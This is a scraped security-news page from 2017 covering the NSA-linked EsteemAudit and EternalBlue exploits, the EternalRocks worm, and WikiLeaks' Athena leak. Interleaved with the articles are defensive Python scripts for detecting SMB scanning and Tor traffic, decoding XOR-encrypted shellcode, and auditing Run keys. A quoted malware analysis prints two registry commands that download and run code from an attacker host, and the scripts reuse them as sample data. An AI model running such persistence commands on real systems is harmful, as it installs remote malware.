- BigBrothers -

Last update 09.10.2017 13:51:26




Researchers Release Patch for NSA-linked "EsteemAudit" Exploit

27.5.2017 securityweek BigBrothers
Security researchers at enSilo have released a patch to keep vulnerable systems protected from a recently released Windows exploit allegedly used by the National Security Agency (NSA)-linked Equation Group.

Dubbed EsteemAudit, this exploit targets a remote desktop protocol (RDP) bug and can be abused to move laterally within a compromised organization’s network, as well as to infect victims with ransomware or backdoors, or to exfiltrate sensitive information.

The exploit might not be as popular as the EternalBlue exploit, which fueled large infections such as WannaCry or Adylkuzz, but it could prove as devastating.

EsteemAudit was made public last month when the hacking group known as the Shadow Brokers decided to release a new set of exploits and tools allegedly stolen from the NSA-linked Equation Group last year. Soon after, Microsoft said the vulnerabilities had been patched in March.

The hackers initially put the tools up for auction, but decided to release some of them for free after failing to attract buyers. Last week, the Shadow Brokers announced plans to launch a subscription service and share more exploits to members for a monthly fee.

Unlike EternalBlue, which affects a variety of Windows versions, EsteemAudit only works on Windows XP and Windows Server 2003, which supposedly limits its overall impact. However, this also means that an official patch is unlikely to arrive from Microsoft, as it no longer offers support for these platform iterations.

Because of that, enSilo decided to release a persistent patch for these systems and keep users safe from attacks possibly leveraging the exploit. The decision was fueled by the fact that a large number of machines continue to use Windows XP and Server 2003, the researchers say.

“Upon login for each session, Windows will create a new instance of winlogon. The patch will be loaded into winlogon.exe (only if it is an RDP session) to perform in memory patching (hotpatching) of EsteemAudit. Any attempt to use EsteemAudit to infect the patched machine will inevitably fail,” enSilo explains.

Installing this patch, however, doesn’t render Windows XP or Server 2003 systems fully secure, as hundreds of other vulnerabilities impacting them still exist and will never be patched. This patch resolves only the vulnerability exploited by EsteemAudit and works on both x86 and x64 platform versions.

The patch is available for download on enSilo’s website and is installed by an installation program after accepting the terms of usage. Uninstallation is supported by signaling an event (which will remove the patch in memory) and unregistering the patch from loading into subsequent RDP sessions.

“The patch for Windows XP and Server 2003 supports silent installation and does not require a reboot, which helps users avoid the required downtime typically associated with patch installations. Upon patching, any attempt to use an EsteemAudit exploit to infect a patched machine will inevitably fail,” the researchers say.


G7 Demands Internet Giants Crack Down on Extremist Content

27.5.2017 securityweek BigBrothers
Taormina, Italy - The G7 nations on Friday demanded action from internet providers and social media firms against extremist content online, vowing to step up their fight against terrorism after the Manchester attack.

"The G7 calls for Communication Service Providers and social media companies to substantially increase their efforts to address terrorist content," Britain, the United States and their G7 partners said in a statement.

"We encourage industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence, and we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism," they said.

Elders at the Manchester mosque where the bomber sometimes worshipped have insisted that they preached a message of peace.

It has been suggested that he may well have been radicalized online by accessing content that is freely available from the likes of the Islamic State group.

"Make no mistake: the fight is moving from the battlefield to the internet," Prime Minister Theresa May told her G7 colleagues.

The G7 also vowed a collective effort to track down and prosecute foreign fighters dispersing from theaters of conflict such as Syria.

One prosecution was recently brought against such a fighter in Turkey, and Britain now wants help from local authorities for more prosecutions in Lebanon, Jordan and Iraq, a British government spokesperson said as the G7 countries met in Sicily.

The stepped-up cooperation comes amid fears that the Manchester bomber had been to Syria after visiting his parents' homeland of Libya.

"It is vital we do more to cooperate with our partners in the region to step up returns and prosecutions of foreign fighters," May said as she chaired a discussion on counter-terrorism in the Sicilian resort of Taormina.

"This means improving intelligence-sharing, evidence gathering and bolstering countries' police and legal processes."

European authorities are increasingly concerned about the threat posed by foreign fighters who went to join the Islamic State group but are now dispersing as the group comes under pressure on the battlefield.

According to a senior British government source, May urged the G7 countries to share police expertise and border security methods with countries where foreign fighters travel through or fight in.

Names and nationalities of foreign fighters should be shared to help their identification by different countries as they cross borders.

"When our allies find evidence, such as video or papers, of illegal activity involving foreign fighters, for example a Brit in a conflict zone, they should pass that to our authorities. It may help prosecute foreign fighters when they return," the source said.


Russia's Disinformation Efforts Hit 39 Countries: Researchers

26.5.2017 securityweek BigBrothers
Russia's campaign of cyberespionage and disinformation has targeted hundreds of individuals and organizations from at least 39 countries along with the United Nations and NATO, researchers said Thursday.

A report by the Citizen Lab at the University of Toronto revealed the existence of "a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society," lead researcher Ronald Deibert said.

The findings suggest that the cyber attacks on the 2016 presidential campaign of Hillary Clinton -- which US intelligence officials have attributed to Russia -- were just the tip of the iceberg.

Citizen Lab researchers said the espionage has targeted not only government, military and industry targets, but also journalists, academics, opposition figures, and activists.

Notable targets, according to the report, have included a former Russian prime minister, former high-ranking US officials, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers and chief executives of energy companies.

In a blog post, Deibert said the Russian-directed campaign follows a pattern of "phishing" attacks to obtain credentials of targets, and carefully "tainted" leaks that mix real and false information to create confusion around the true facts.

"Russia has a long history of experience with what is known as 'dezinformatsiya,' going back even to Soviet times," Deibert said.

"Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials -- 'falsehoods in a forest of facts'... is very difficult to distinguish and counter, especially when it is presented as a salacious 'leak' integrated with what otherwise would be private information."

Deibert said the researchers had no "smoking gun" that links the campaign to a particular government agency but added that "our report nonetheless provides clear evidence of overlap with what has been publicly reported by numerous industry and government reports about Russian cyber espionage."

Citizen Lab said one of the targets was US journalist David Satter, who has written extensively on corruption in Russia.

Satter's stolen e-mails were "selectively modified," and then "leaked" to give the false impression that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin, the report said.

Similar leak campaigns targeted officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam, according to the report.

UN officials and military personnel from more than a dozen countries were also targets, Citizen Lab said.

"Our hope is that in studying closely and publishing the details of such tainted leak operations, our report will help us better understand how to recognize and mitigate them," Deibert said.


NSA EsteemAudit exploit could trigger a new WannaCry-like attack
26.5.2017 securityaffairs BigBrothers

Security experts from enSilo firm released a free patch for Windows systems vulnerable to the NSA-linked ESTEEMAUDIT Exploit.
The WannaCry emergency could not be ended because the NSA dump leaked by the Shadow Brokers team included many other dangerous exploits.

Last month the Shadow Brokers group released another batch of data containing exploit code for flaws still unpatched by Microsoft, such as “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan.”

The availability of such exploits and hacking tools represents a serious problem; an attacker with technical knowledge can use them to compromise millions of Windows systems across the world.

“Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk.” continues Microsoft.

Let’s start with the EsteemAudit exploit. It is a hacking tool that targets the RDP service (port 3389) on machines running the no longer supported Microsoft Windows Server 2003 and Windows XP.

It has been estimated that over 24,000 systems remain vulnerable to the EsteemAudit exploit.

“Even one infected machine opens your enterprise to greater exploitation,” explained security researchers Omri Misgav and Tal Liberman, who work for the enSilo cyber security firm and developed an unofficial patch for the EsteemAudit exploit.

“In the trove of stolen exploits published by the Shadow Group appears ESTEEMAUDIT, an RDP exploit which can allow malware to move laterally within the organization, similar to what we had seen with WannaCry.” reads a blog post from Ensilo.

“enSilo is giving away its patch against ESTEEMAUDIT for free with the intention of helping organizations around the world to better improve their security posture in one easy, but critical step.

It is important to note that patching this exploit will not make these XP systems fully secure. There are still many unpatched vulnerabilities in Windows XP, and we urge organizations to update their systems accordingly.

Until that happens, we believe that in-the-wild critical exploits like ESTEEMAUDIT and ETERNALBLUE must be patched.”

Experts warn that the EsteemAudit exploit could be used in network-wormable threats: threat actors in the wild can develop malware that propagates itself across a target’s network without user interaction.

“Years later, there continue to be hundreds of millions of machines relying on XP and Server 2003 operating systems in use around the world. Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today and the cybersecurity industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of global market share.” continues the blog post from Ensilo.

There are already many malware families in the wild that infect systems using the RDP protocol as their attack vector (CrySiS, Dharma, and SamSam); the EsteemAudit exploit can potentially make these threats far more aggressive and dangerous.

Users and enterprises running the vulnerable systems are advised to upgrade them to newer versions to protect themselves from EsteemAudit attacks.
When it is impossible to upgrade the systems, it is necessary to secure them by other means, for example by disabling the RDP service or placing it behind a firewall.

You can also deploy the unofficial patch developed by Ensilo to secure your systems.


Expert finds EternalRocks, a malware that uses 7 NSA Hacking Tools
23.5.2017 securityaffairs BigBrothers

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.

Stampar discovered EternalRocks after it infected his SMB honeypot; he initially called the malware ‘DoomsDayWorm.’

Miroslav Stampar @stamparm, 18 May 2017:
“If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95”

Stampar discovered that the EternalRocks disguises itself as WannaCry, but instead of delivering a ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.


Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)
5:28 PM - 17 May 2017
73 73 Retweets 87 87 likes
Twitter Ads info & Privacy
Follow
Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on https://github.com/stamparm/EternalRocks/ …. Will keep it updated, along with @_jsoo_
2:43 PM - 18 May 2017
Photo published for stamparm/EternalRocks
stamparm/EternalRocks
Contribute to EternalRocks development by creating an account on GitHub.
github.com
137 137 Retweets 136 136 likes
Twitter Ads info & Privacy
Unlike the WannaCry ransomware, which leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks uses seven tools leaked by the Shadow Brokers, and its code doesn’t include a kill switch.

EternalRocks was developed to remain undetected on the target system, and it uses the following NSA tools:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan
EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.

EternalRocks

Looking closely at the list, we find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.

The DoublePulsar backdoor is used by the malware to implement its network worm capabilities, while SMBTouch and ArchTouch are SMB reconnaissance tools, designed to scan for systems with open SMB ports exposed on the Internet.

The EternalRocks works in two stages:

During the first stage, EternalRocks downloads the Tor web browser on the affected computers, then it uses the application to connect to the command-and-control (C&C) server located on the Tor network.

The second stage starts only after 24 hours; the malware delays its action in an attempt to evade sandboxing techniques.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages)TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).” wrote the researcher.

“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.”


EternalRocks Network Worm Leverages 7 NSA Hacking Tools

23.5.2017 securityweek BigBrothers
EternalRocks Worm Uses NSA Exploits to Compromise Systems and Install DoublePulsar Backdoor

A recently discovered network worm leverages a total of seven hacking tools stolen from the National Security Agency (NSA)-linked Equation Group.

Dubbed EternalRocks and capable of self-replication, the threat emerged over the past couple of weeks, with the most recent known sample dated May 3. The malware was discovered by security researcher Miroslav Stampar, who also found that the tool was initially called MicroBotMassiveNet.

The seven NSA hacking tools included in the network worm include the EternalBlue, EternalChampion, EternalRomance, and EternalSynergy exploits, along with the DoublePulsar backdoor and the Architouch, and Smbtouch SMB reconnaissance tools.

The exploits were made public in April by the hacker group going by the name of Shadow Brokers and are said to have been stolen from the NSA-linked threat actor Equation Group last year. Within days after the tools were released, Microsoft said that it had already patched the vulnerabilities targeted by the exploits with its March 2017 security updates.

However, because not all vulnerable devices have been patched, these exploits continue to be effective, and the recent WannaCry ransomware outbreak is the best example of that. The WannaCry malware abused the EternalBlue exploit for distribution, and other threats did the same, including the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

The EternalRocks worm is yet another malicious program attempting to cash in on the release of these exploits. Its purpose seems pretty straightforward: it compromises systems to install the DoublePulsar backdoor on them.

The worm uses a two-stage infection process to deliver its payload, but appears to be more of a research project at the moment than an actual malicious tool.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe and taskhost.exe. Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (command and control) communication requesting further instructions,” Stampar notes.

The second-stage payload is downloaded only after a 24-hour period has passed, and is hidden as the taskhost.exe process. The payload drops the exploit pack shadowbrokers.zip, unpacks contained directories payloads/, configs/ and bins/, and then starts a random scan of opened 445 (SMB) ports on the Internet.

EternalRocks also runs contained exploits (inside directory bins/) and pushes the first stage malware through payloads (inside directory payloads/). Moreover, the running Tor process continues to wait for further instructions from the C&C.

In an emailed comment, Michael Patterson, CEO of Plixer, told SecurityWeek that EternalRocks, currently the “first known malware incorporating all seven of the NSA hacking tools,” is clearly a more stealthy tool, given its delayed Tor communication and that administrators looking to keep their systems safe from this threat might have already lost the battle with it.

“Once a device is infected, applying a subsequent patch does not remove the malware. The most effective way for security teams to monitor for any infected devices is to leverage network traffic analytics to look for any historical Tor connections leaving the organization,” Patterson said.

“The race to detect and stop all malware was lost years ago. Organizations must constantly monitor their environments for anomalous behaviors, maintain a historical forensic database, and have a well-defined storage backup and recovery process for all critical data,” he concluded.
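The two behaviours described in both EternalRocks write-ups above, an infected host sweeping the Internet on TCP/445 after the 24-hour delay and the first stage talking to a C&C over Tor, are exactly what Patterson’s suggestion of network traffic analytics would look for. The following is an added example, not code from the researchers or from any vendor: it parses a constructed connection log, flags internal hosts that reach many distinct external addresses on port 445 inside a short window, and flags outbound connections to Tor. The log format, the scan threshold and the "known Tor relay" addresses are assumptions; in practice the relay list would come from a Tor relay or exit-node feed.

```python
"""Hunt for EternalRocks-style behaviour in connection logs.

Added example (not the researchers' code).  Constructed log format:
    2017-05-18T03:44:00 10.0.0.5 -> 198.18.0.1:445
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List, NamedTuple

INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
# Assumption: placeholder relay addresses from the documentation ranges; a real
# deployment would load a current Tor relay/exit feed here.
KNOWN_TOR_RELAYS = {"203.0.113.7", "198.51.100.42"}
TOR_DEFAULT_PORTS = {9001, 9030}      # Tor default ORPort/DirPort; heuristic only, many relays use 443
SCAN_THRESHOLD = 20                   # distinct external targets on 445 that count as a sweep
SCAN_WINDOW = timedelta(minutes=5)


class Flow(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int


def is_internal(ip: str) -> bool:
    return any(ip_address(ip) in net for net in INTERNAL)


def parse_flow(line: str) -> Flow:
    ts, src, _arrow, dst = line.split()
    host, port = dst.rsplit(":", 1)
    return Flow(datetime.fromisoformat(ts), src, host, int(port))


def detect_smb_scanners(flows: List[Flow]) -> Dict[str, int]:
    """Internal hosts that hit >= SCAN_THRESHOLD distinct external IPs on 445 within SCAN_WINDOW.
    Returns {source_ip: peak number of distinct targets seen in one window}."""
    per_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        if f.dport == 445 and is_internal(f.src) and not is_internal(f.dst):
            per_src[f.src].append(f)
    scanners: Dict[str, int] = {}
    for src, fl in per_src.items():
        fl.sort(key=lambda f: f.ts)
        window: List[Flow] = []                     # sliding time window over this host's flows
        for f in fl:
            window.append(f)
            while f.ts - window[0].ts > SCAN_WINDOW:
                window.pop(0)
            distinct = len({w.dst for w in window})
            if distinct >= SCAN_THRESHOLD:
                scanners[src] = max(scanners.get(src, 0), distinct)
    return scanners


def detect_tor_egress(flows: List[Flow]) -> List[Flow]:
    """Outbound flows to a known relay address or to Tor's default relay ports."""
    return [f for f in flows
            if is_internal(f.src) and not is_internal(f.dst)
            and (f.dst in KNOWN_TOR_RELAYS or f.dport in TOR_DEFAULT_PORTS)]


def analyze(lines: List[str]) -> dict:
    flows = [parse_flow(line) for line in lines]
    return {
        "smb_scanners": detect_smb_scanners(flows),
        "tor_egress": [(f.src, f.dst, f.dport) for f in detect_tor_egress(flows)],
    }


def build_sample_log() -> List[str]:
    """Constructed log: one host sweeps 25 external addresses on 445 in under two
    minutes and later contacts a relay on 9001; a second host does only normal traffic."""
    base = datetime(2017, 5, 18, 3, 44, 0)
    lines = [f"{(base + timedelta(seconds=4 * i)).isoformat()} 10.0.0.5 -> 198.18.0.{i + 1}:445"
             for i in range(25)]
    lines.append(f"{(base + timedelta(hours=1)).isoformat()} 10.0.0.5 -> 203.0.113.7:9001")
    for peer in ("10.0.0.20", "10.0.0.21", "10.0.0.22"):      # internal SMB is not a sweep
        lines.append(f"{base.isoformat()} 10.0.0.9 -> {peer}:445")
    lines.append(f"{base.isoformat()} 10.0.0.9 -> 203.0.113.50:443")
    return lines


if __name__ == "__main__":
    for kind, hits in analyze(build_sample_log()).items():
        print(kind, hits)
```

Internal-to-internal SMB is deliberately ignored so that file servers do not trip the sweep rule; the threshold and window are tuning knobs, and the Tor port heuristic will miss relays listening on 443, which is why a relay feed, not the port list, should be the primary signal.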


WikiLeaks Details Malware Made by CIA and U.S. Security Firm

22.5.2017 securityweek BigBrothers
WikiLeaks has published documents detailing another spy tool allegedly used by the U.S. Central Intelligence Agency (CIA). The latest files describe “Athena,” a piece of malware whose developers claim it works on all versions of Windows.

Documents apparently created between September 2015 and February 2016 describe Athena as an implant that can be used as a beacon and for loading various payloads into memory. The tool also allows its operator to plant and fetch files to or from a specified location on the compromised system.

A leaked diagram shows that Athena can be loaded onto the targeted computer by an asset, a remote operator, or via the supply chain. The implant is said to work on all versions of Windows from XP through 10, including Windows Server 2008 and 2012, on both x86 and x64 architectures.

While WikiLeaks has not made available the actual Athena tool, experts pointed out that the leaked documents include information on file and registry changes made by the implant, which can be useful for determining if a system has been compromised.

The documents also show that Athena was developed in collaboration with Siege Technologies, a U.S.-based company that provides offensive-driven cybersecurity solutions. The firm was acquired last year by Nehemiah Security.

WikiLeaks pointed to an email stolen from Italian spyware maker Hacking Team in which Siege Technologies founder Jason Syversen says he’s “more comfortable working on electronic warfare.”

Since March 8, when it first announced the Vault 7 files focusing on the CIA’s hacking capabilities, WikiLeaks has regularly published documents describing various implants allegedly used by the agency. The latest leaks have focused on Windows hacking tools, including for man-in-the-middle (MitM) attacks on the LAN, for hampering malware attribution and analysis, and creating custom malware installers.

Many of the tech companies whose tools are targeted by the Vault 7 exploits claimed their latest products are not affected. Only Cisco admitted finding a critical vulnerability that had exposed many of the company’s switches.

The Vault 7 files and the exploits leaked by the hacker group called Shadow Brokers, including ones used in the recent WannaCry ransomware attacks, have once again brought exploit stockpiling by governments into the spotlight.

“We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,” said Microsoft president and chief legal officer Brad Smith.

In response to concerns over the stockpiling of exploits, a group of U.S. lawmakers last week proposed a new bill, the “Protecting Our Ability to Counter Hacking Act of 2017” (PATCH Act), which aims to help find a balance between national security needs and public safety.


At least 3 different groups have been leveraging the NSA EternalBlue exploit, what went wrong?
22.5.2017 securityaffairs BigBrothers

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers other threats have used it as well, such as the Adylkuzz botnet, which has been active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT didn’t show network worm capabilities like the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”
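An analyst who has captured such a payload from a honeypot needs to undo the XOR layer and find the embedded binary before the DLL can be examined. The following is an added example, not Cyphort’s code: it XORs a blob with the 4-byte key quoted above, then locates the embedded PE image by validating the DOS header rather than trusting a bare “MZ” match. The payload bytes it decodes are constructed for illustration (a stub prefix plus a minimal DOS/PE header), not the actual sample.

```python
"""Recover a DLL embedded in shellcode that was XOR-encrypted with a repeating
4-byte key.  Added example; the key is the one quoted in the Cyphort analysis,
the sample bytes are constructed."""
import struct
from typing import Optional

XOR_KEY = bytes.fromhex("A9CA63BA")   # key quoted in the analysis


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def find_embedded_pe(blob: bytes) -> int:
    """Offset of the first plausible PE image in blob, or -1.

    A PE image starts with 'MZ' and stores at DOS-header offset 0x3C the offset
    of its 'PE\\0\\0' signature.  Checking that pointer avoids false hits on
    random 'MZ' byte pairs inside shellcode."""
    start = 0
    while True:
        pos = blob.find(b"MZ", start)
        if pos == -1 or pos + 0x40 > len(blob):
            return -1
        (e_lfanew,) = struct.unpack_from("<I", blob, pos + 0x3C)
        sig = pos + e_lfanew
        if 0 < e_lfanew < 0x1000 and blob[sig:sig + 4] == b"PE\0\0":
            return pos
        start = pos + 1


def extract_embedded_dll(encrypted: bytes, key: bytes = XOR_KEY) -> Optional[bytes]:
    """Decrypt the captured blob and return everything from the embedded PE header onward."""
    decoded = xor_bytes(encrypted, key)
    offset = find_embedded_pe(decoded)
    return None if offset == -1 else decoded[offset:]


def build_sample() -> bytes:
    """Constructed sample: a 16-byte stub prefix with no meaning, then a minimal
    DOS header whose e_lfanew points at a 'PE\\0\\0' signature, XOR-encrypted."""
    stub = bytes(range(0x90, 0xA0))
    e_lfanew = 0x80
    dos_header = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)      # 0x40 bytes
    image = dos_header + b"\0" * (e_lfanew - len(dos_header)) + b"PE\0\0" + b"\0" * 20
    return xor_bytes(stub + image, XOR_KEY)


if __name__ == "__main__":
    dll = extract_embedded_dll(build_sample())
    print("embedded PE found" if dll else "no PE found", len(dll or b""), "bytes")
```

On a real capture the same two steps apply, but the key would first have to be confirmed (for example by XOR-ing the first bytes of the blob against the expected “MZ” header) rather than assumed.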

Once it has infected a system, the malicious code closes port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
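Both Run entries share a pattern worth auditing for on any host: a trusted Windows binary (regsvr32 with scrobj.dll, msiexec) told to fetch its code from a URL at logon. The following is an added example, not Cyphort’s code: it parses reg add commands (as they would appear in command-line logging) and flags Run-key values that load remote content. The two malicious lines are the ones quoted above; the third, benign line is constructed.

```python
"""Flag Registry Run-key values that fetch code from the network.
Added example; the two malicious commands are those quoted in the Cyphort
report, the benign third one is constructed."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input set: the report's two persistence commands plus one benign value.
SAMPLE_COMMANDS = [
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /d "C:\Program Files\Vendor\updater.exe /background" /f',
]

REG_ADD_RE = re.compile(
    r'^reg\s+add\s+"(?P<key>[^"]+)"\s+/v\s+"(?P<name>[^"]+)"\s+/d\s+"(?P<data>[^"]+)"',
    re.IGNORECASE,
)
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def parse_reg_add(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (key, value name, value data) for a quoted 'reg add' command, else None."""
    m = REG_ADD_RE.match(line.strip())
    return None if m is None else (m["key"], m["name"], m["data"])


def is_run_key(key: str) -> bool:
    low = key.lower()
    return low.endswith(r"\currentversion\run") or low.endswith(r"\currentversion\runonce")


def suspicious_reasons(data: str) -> List[str]:
    """Why an autorun value looks like remote code loading; empty list means nothing flagged."""
    low = data.lower()
    urls = URL_RE.findall(data)
    reasons = []
    if "regsvr32" in low and "scrobj.dll" in low and "/i:" in low:
        reasons.append("regsvr32 executing a scriptlet through scrobj.dll")
    if "msiexec" in low and urls:
        reasons.append("msiexec installing a package from a URL")
    if urls and not reasons:
        reasons.append("autorun value references a URL")
    return reasons


def audit(lines: List[str]) -> List[Dict[str, object]]:
    """Scan command lines and report Run-key values that pull code from the network."""
    findings = []
    for line in lines:
        parsed = parse_reg_add(line)
        if parsed is None:
            continue
        key, name, data = parsed
        if not is_run_key(key):
            continue
        reasons = suspicious_reasons(data)
        if reasons:
            findings.append({"name": name, "urls": URL_RE.findall(data), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_COMMANDS):
        print(finding)
```

The same classification can be applied directly to values read from HKLM and HKCU Run/RunOnce keys on a live host; the URLs it extracts (here the js.mykings.top addresses from the report) double as indicators for proxy and DNS log searches.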
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including monitoring the screen, capturing audio and video, logging keystrokes, transferring data, deleting files, terminating processes, downloading and executing files, and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The fact that multiple groups have been exploiting ETERNALBLUE for weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

EternalBlue SMB flaw

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat runs entirely in the memory of the infected system after exploiting EternalBlue.

In late April, the experts at Secdo also discovered another attack exploiting the EternalBlue vulnerability; it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups had been leveraging the NSA exploit for weeks before WannaCry, which means that a significant portion of the security community either failed to monitor the threat or failed to share information about the attacks they had observed.

The success of the EternalBlue attacks is a failure of our current model of cyber security.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

22.5.2017 securityweek BigBrothers
In the aftermath of the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

